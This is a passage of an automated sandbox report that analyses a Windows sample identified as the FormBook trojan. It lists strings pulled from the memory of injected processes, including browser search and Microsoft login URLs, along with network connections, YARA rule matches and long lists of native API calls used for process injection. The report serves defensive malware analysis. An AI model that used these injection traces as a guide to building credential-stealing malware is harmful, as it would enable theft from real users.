height:800px; width:100%; }
          Source: dfrgui.exe, 00000009.00000002.2690174936.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 0000000A.00000002.3858719384.0000000002FD6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.3856627290.00000000388B6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: dfrgui.exe, 00000009.00000002.2690174936.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, oOOsxwAhjIw.exe, 0000000A.00000002.3858719384.0000000002FD6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.3856627290.00000000388B6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&comm
          Source: dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: dfrgui.exe, 00000009.00000002.2688193511.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: dfrgui.exe, 00000009.00000002.2688193511.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: dfrgui.exe, 00000009.00000002.2688193511.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: dfrgui.exe, 00000009.00000002.2688193511.000000000046A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033V
          Source: dfrgui.exe, 00000009.00000002.2688193511.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: dfrgui.exe, 00000009.00000002.2688193511.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: dfrgui.exe, 00000009.00000003.2621383147.00000000076F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
          Source: dfrgui.exe, 00000009.00000002.2688193511.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.5:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.5:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49729 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.opp.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.opp.scr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3859938760.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2689683266.0000000004130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2689714641.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2393254649.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3858270697.0000000004E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2399808380.00000000041B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.opp.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.opp.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.opp.scr.exe.4146390.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 0.2.opp.scr.exe.57d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 0.2.opp.scr.exe.57d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 0.2.opp.scr.exe.4146390.2.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 0.2.opp.scr.exe.30e1c3c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 0.2.opp.scr.exe.30df3fc.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
          Source: 00000000.00000002.1993109021.00000000057D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
          Source: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.3859938760.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.2689683266.0000000004130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.2689714641.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.2393254649.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.3858270697.0000000004E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.2399808380.00000000041B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040B0C3 NtCreateSection,1_2_0040B0C3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040A883 NtGetContextThread,1_2_0040A883
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040B2E3 NtMapViewOfSection,1_2_0040B2E3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040AA93 NtSetContextThread,1_2_0040AA93
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040BBB3 NtDelayExecution,1_2_0040BBB3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040ACA3 NtResumeThread,1_2_0040ACA3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040B513 NtCreateFile,1_2_0040B513
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040A673 NtSuspendThread,1_2_0040A673
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0042BF43 NtClose,1_2_0042BF43
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040B743 NtReadFile,1_2_0040B743
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040BFD3 NtAllocateVirtualMemory,1_2_0040BFD3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2B60 NtClose,LdrInitializeThunk,1_2_016D2B60
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_016D2DF0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_016D2C70
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D35C0 NtCreateMutant,LdrInitializeThunk,1_2_016D35C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D4340 NtSetContextThread,1_2_016D4340
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D4650 NtSuspendThread,1_2_016D4650
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2BE0 NtQueryValueKey,1_2_016D2BE0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2BF0 NtAllocateVirtualMemory,1_2_016D2BF0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2BA0 NtEnumerateValueKey,1_2_016D2BA0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2B80 NtQueryInformationFile,1_2_016D2B80
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2AF0 NtWriteFile,1_2_016D2AF0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2AD0 NtReadFile,1_2_016D2AD0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2AB0 NtWaitForSingleObject,1_2_016D2AB0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2D30 NtUnmapViewOfSection,1_2_016D2D30
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2D00 NtSetInformationFile,1_2_016D2D00
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2D10 NtMapViewOfSection,1_2_016D2D10
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2DD0 NtDelayExecution,1_2_016D2DD0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2DB0 NtEnumerateKey,1_2_016D2DB0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2C60 NtCreateKey,1_2_016D2C60
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2C00 NtQueryInformationProcess,1_2_016D2C00
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2CF0 NtOpenProcess,1_2_016D2CF0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2CC0 NtQueryVirtualMemory,1_2_016D2CC0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2CA0 NtQueryInformationToken,1_2_016D2CA0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2F60 NtCreateProcessEx,1_2_016D2F60
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2F30 NtCreateSection,1_2_016D2F30
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2FE0 NtCreateFile,1_2_016D2FE0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2FA0 NtQuerySection,1_2_016D2FA0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2FB0 NtResumeThread,1_2_016D2FB0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2F90 NtProtectVirtualMemory,1_2_016D2F90
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2E30 NtWriteVirtualMemory,1_2_016D2E30
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2EE0 NtQueueApcThread,1_2_016D2EE0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2EA0 NtAdjustPrivilegesToken,1_2_016D2EA0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2E80 NtReadVirtualMemory,1_2_016D2E80
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D3010 NtOpenDirectoryObject,1_2_016D3010
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D3090 NtSetValueKey,1_2_016D3090
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D39B0 NtGetContextThread,1_2_016D39B0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D3D70 NtOpenThread,1_2_016D3D70
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D3D10 NtOpenProcessToken,1_2_016D3D10
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04414650 NtSuspendThread,LdrInitializeThunk,9_2_04414650
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04414340 NtSetContextThread,LdrInitializeThunk,9_2_04414340
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412C60 NtCreateKey,LdrInitializeThunk,9_2_04412C60
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04412C70
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_04412CA0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412D10 NtMapViewOfSection,LdrInitializeThunk,9_2_04412D10
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_04412D30
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412DD0 NtDelayExecution,LdrInitializeThunk,9_2_04412DD0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_04412DF0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412EE0 NtQueueApcThread,LdrInitializeThunk,9_2_04412EE0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_04412E80
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412F30 NtCreateSection,LdrInitializeThunk,9_2_04412F30
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412FE0 NtCreateFile,LdrInitializeThunk,9_2_04412FE0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412FB0 NtResumeThread,LdrInitializeThunk,9_2_04412FB0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412AD0 NtReadFile,LdrInitializeThunk,9_2_04412AD0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412AF0 NtWriteFile,LdrInitializeThunk,9_2_04412AF0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412B60 NtClose,LdrInitializeThunk,9_2_04412B60
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412BE0 NtQueryValueKey,LdrInitializeThunk,9_2_04412BE0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04412BF0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_04412BA0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044135C0 NtCreateMutant,LdrInitializeThunk,9_2_044135C0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044139B0 NtGetContextThread,LdrInitializeThunk,9_2_044139B0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412C00 NtQueryInformationProcess,9_2_04412C00
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412CC0 NtQueryVirtualMemory,9_2_04412CC0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412CF0 NtOpenProcess,9_2_04412CF0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412D00 NtSetInformationFile,9_2_04412D00
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412DB0 NtEnumerateKey,9_2_04412DB0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412E30 NtWriteVirtualMemory,9_2_04412E30
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412EA0 NtAdjustPrivilegesToken,9_2_04412EA0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412F60 NtCreateProcessEx,9_2_04412F60
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412F90 NtProtectVirtualMemory,9_2_04412F90
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412FA0 NtQuerySection,9_2_04412FA0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412AB0 NtWaitForSingleObject,9_2_04412AB0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04412B80 NtQueryInformationFile,9_2_04412B80
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04413010 NtOpenDirectoryObject,9_2_04413010
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04413090 NtSetValueKey,9_2_04413090
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04413D70 NtOpenThread,9_2_04413D70
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04413D10 NtOpenProcessToken,9_2_04413D10
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004028841_2_00402884
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004028901_2_00402890
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0042E2F31_2_0042E2F3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004012B01_2_004012B0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004033D01_2_004033D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_00417BEE1_2_00417BEE
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_00417BF31_2_00417BF3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004114431_2_00411443
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0041143A1_2_0041143A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004025C01_2_004025C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004025F91_2_004025F9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004015801_2_00401580
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004025B31_2_004025B3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004116631_2_00411663
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_00402ED01_2_00402ED0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040F6E31_2_0040F6E3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004027091_2_00402709
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017281581_2_01728158
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016901001_2_01690100
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173A1181_2_0173A118
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017581CC1_2_017581CC
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017541A21_2_017541A2
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017601AA1_2_017601AA
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017320001_2_01732000
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175A3521_2_0175A352
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017603E61_2_017603E6
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AE3F01_2_016AE3F0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017402741_2_01740274
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017202C01_2_017202C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A05351_2_016A0535
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017605911_2_01760591
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017524461_2_01752446
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017444201_2_01744420
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0174E4F61_2_0174E4F6
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A07701_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C47501_2_016C4750
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169C7C01_2_0169C7C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BC6E01_2_016BC6E0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B69621_2_016B6962
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A01_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0176A9A61_2_0176A9A6
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A28401_2_016A2840
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AA8401_2_016AA840
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CE8F01_2_016CE8F0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016868B81_2_016868B8
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175AB401_2_0175AB40
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01756BD71_2_01756BD7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169EA801_2_0169EA80
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AAD001_2_016AAD00
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173CD1F1_2_0173CD1F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169ADE01_2_0169ADE0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B8DBF1_2_016B8DBF
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0C001_2_016A0C00
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01690CF21_2_01690CF2
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01740CB51_2_01740CB5
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01714F401_2_01714F40
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01742F301_2_01742F30
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016E2F281_2_016E2F28
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C0F301_2_016C0F30
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016ACFE01_2_016ACFE0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01692FC81_2_01692FC8
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171EFA01_2_0171EFA0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0E591_2_016A0E59
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175EE261_2_0175EE26
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175EEDB1_2_0175EEDB
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175CE931_2_0175CE93
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B2E901_2_016B2E90
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D516C1_2_016D516C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168F1721_2_0168F172
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0176B16B1_2_0176B16B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AB1B01_2_016AB1B0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175F0E01_2_0175F0E0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017570E91_2_017570E9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A70C01_2_016A70C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0174F0CC1_2_0174F0CC
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168D34C1_2_0168D34C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175132D1_2_0175132D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016E739A1_2_016E739A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017412ED1_2_017412ED
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BB2C01_2_016BB2C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A52A01_2_016A52A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017575711_2_01757571
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017695C31_2_017695C3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173D5B01_2_0173D5B0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016914601_2_01691460
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175F43F1_2_0175F43F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175F7B01_2_0175F7B0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016E56301_2_016E5630
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017516CC1_2_017516CC
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A99501_2_016A9950
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BB9501_2_016BB950
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017359101_2_01735910
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170D8001_2_0170D800
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A38E01_2_016A38E0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175FB761_2_0175FB76
